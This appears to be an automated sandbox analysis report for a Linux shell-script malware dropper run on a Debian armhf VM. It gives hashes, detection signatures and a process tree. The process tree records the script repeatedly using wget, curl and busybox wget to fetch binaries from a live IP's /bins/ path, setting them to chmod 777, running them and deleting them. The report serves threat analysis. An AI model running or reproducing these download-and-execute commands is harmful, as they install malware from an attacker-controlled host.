Analysis
-
max time kernel
32s -
max time network
59s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
28/10/2024, 02:38
Static task
static1
Behavioral task
behavioral1
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
-
Size
10KB
-
MD5
b2db94a95f3a12911c7e79383b2e9f18
-
SHA1
17b862a1f3cda3d5cbfb97bc0bcbd640f72f4fd3
-
SHA256
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c
-
SHA512
3b76d645c8332a5801de9ec5563c4376494571a0736d91e22743912fb8c2b2b3670146be65fa21f4b9a8a080d77960aa2f96e6a437a5f58f219da6c0e23f36c6
-
SSDEEP
192:HfsfQf5fkfMfaLD/WzzdGflUflcflNflQflcflLVzDwrSaqbNhxoZluTFhm9l+I5:/WClO2aLD/WzzdG6mLiKNPZxhxoZluT4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicates if the system is a virtual machine.
description ioc Process
File opened for reading /proc/cpuinfo curl
-
Reads runtime system information
description ioc Process
File opened for reading /proc/self/auxv curl
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh1⤵PID:661
-
/bin/rm/bin/rm bins.sh2⤵PID:663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:668
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:685
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:694
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:695
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:697
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:700
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:723
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:728
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:729
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:740
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:762
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:768
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:786
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:802
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:816
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:822
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:828
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:834
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:840
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:846
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:852
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:858
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:864
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:870
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:876
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:884
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:890
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:896
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:902
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:908
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:914
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:923
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:930
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:937
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:940
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97